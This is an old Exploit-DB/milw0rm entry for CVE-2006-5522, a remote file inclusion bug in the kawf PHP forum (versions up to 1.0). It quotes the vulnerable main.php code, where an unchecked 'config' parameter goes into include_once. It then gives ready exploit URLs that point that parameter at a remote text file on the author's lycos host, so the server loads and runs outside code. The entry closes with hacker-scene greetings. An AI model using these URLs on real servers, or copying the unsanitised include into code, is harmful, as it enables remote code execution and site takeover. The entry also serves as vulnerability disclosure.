kawf <= 1.0 main.php Remote File Include Vulnerability

2006-10-21T00:00:00
ID EDB-ID:2607
Type exploitdb
Reporter o0xxdark0o
Modified 2006-10-21T00:00:00

Description

kawf <= 1.0 (main.php) Remote File Include Vulnerability. CVE-2006-5522. Webapps exploit for php platform

                                        
                                            ####################################################################
#       kawf (config)  Remote File Include
#---------------------------------------------------------------------------------------------
#       Kawf is a web forum written in PHP4 using MySQL
#        v. 1.0 and all below
#--------------------------------------------------------------------------------------------
#       download :
#       http://sourceforge.net/projects/kawf
#--------------------------------------------------------------------------------------------
#       see the bug file:
#       http://koders.com/php/fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=require
#--------------------------------------------------------------------------------------------
#       bug in  :
#       main.php
#--------------------------------------------------------------------------------------------
#code : { i wrote all code for str0ke :D :D } include in line 13 ::
#                                                       #
#                                                       /* First setup the path */
#                                                       $include_path = "$srcroot/include:$srcroot/user/account";
#                                                       if (isset($include_append))
#                                                         $include_path .= ":" . $include_append;
#
#                                                       $old_include_path = ini_get("include_path");
#                                                       if (!empty($old_include_path))
#                                                         $include_path .= ":" . $old_include_path;
#                                                       ini_set("include_path", $include_path);
#
#                                                       include_once("$config.inc");
#                                                       require_once("sql.inc");
#                                                       require_once("util.inc");
#                                                       require_once("page.inc");
#                                                       require_once("forumuser.inc");
#
#                                                       sql_open($database);
#
#                                                       include("index.php");
#
#                                                       sql_close();
#                                                       ?&gt;
#--------------------------------------------------------------------------------------------
#       exploit:
#          kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#                                          or
#         (path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?
#--------------------------------------------------------------------------
#       greetz :  str0ke ,  c0ldz3r0 ,  all members in  xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D
#      inter_vieri_21 dont play runescape :d :d
#-------------------------------------------------------------------------
#      by o0xxdark0o
# i think... so that... i m here
#  o0xxdark0o@msn.com
####################################################################

# milw0rm.com [2006-10-21]